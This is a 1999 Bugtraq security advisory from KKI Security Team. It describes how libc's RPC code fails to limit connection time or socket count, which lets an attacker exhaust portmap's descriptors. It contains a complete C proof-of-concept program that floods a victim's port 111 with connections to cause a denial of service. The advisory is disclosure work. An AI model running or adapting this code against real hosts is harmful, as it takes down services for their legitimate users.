[10218] in bugtraq
KKIS.08041999.001.b - security raport - flaws in rpc part of libc
daemon@ATHENA.MIT.EDU (Lukasz Luzar)
Thu Apr 15 13:24:11 1999
Date: Wed, 14 Apr 1999 15:26:14 +0200
Reply-To: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
To: BUGTRAQ@NETSPACE.ORG
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###
S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team Cracow Commercial Internet, Poland
http://www.security.kki.pl http://www.kki.pl
mailto:security@security.kki.pl mailto:biuro@kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Raport title : Lack of RPC's implementation in libc libraries
and how it affects for example portmap.
Problem found by : Lukasz Luzar (lluzar@security.kki.pl)
Raport created by : Robert Pajak (shadow@security.kki.pl)
Lukasz Luzar (lluzar@security.kki.pl)
Problem found at : 08 April 1999
Raport published : 14 April 1999
Raport code : KKIS.08041999.001.b
Short description : full description below
Vulnerable versions : libc*, up to current.
Platforms affected : Linux X.X, FreeBSD X.X, probably others...
Patches : curently not available
Archive : http://www.security.kki.pl/advisories/
Impact description : full description below
Risk level : medium
Notes : we were unable to contact with authors of libc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It seems that libc's RPC implementation does not check neither time
of established connections, nor number of connected sockets.
It is quite dangerous, because many network services is based on this
functions.
~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Below there is ther program which shows how to make DoS of portmap (tcp)
When max. limit of descriptors per process is not set, it could
easly lead to haevy problems with victim's machine stability.
(e.g. default sets on FreeBSD)
When limit of open descriptors is reached, portmap begins to refuse all
new connections.
~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example sources ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- CUT HERE ---
/*
* example.c by Lukasz Luzar (lluzar@security.kki.pl)
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define ADDR "10.0.0.1" // victim's IP address in dot notation
#define PORT 111 // victim service to DoS eg. portmapper
void main()
{
int sockfd,
n = 0;
struct sockaddr_in victim_addr;
bzero((char *) &victim_addr, sizeof( victim_addr));
victim_addr.sin_family = AF_INET;
victim_addr.sin_addr.s_addr=inet_addr( ADDR);
victim_addr.sin_port = htons( PORT);
fprintf( stdout, "Opening new connections...\n");
for(;;) {
if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf( stderr, "socket error at %d\n",n);
break;
}
if( connect( sockfd,(struct sockaddr*) &victim_addr,
sizeof( victim_addr)) < 0) {
fprintf( stderr,"connect error at %d\n",n);
break;
}
n++;
}
fprintf( stdout, "Established %d connections "
"and waiting...\n", n);
for(;;);
}
--- CUT HERE ---
~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.
All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
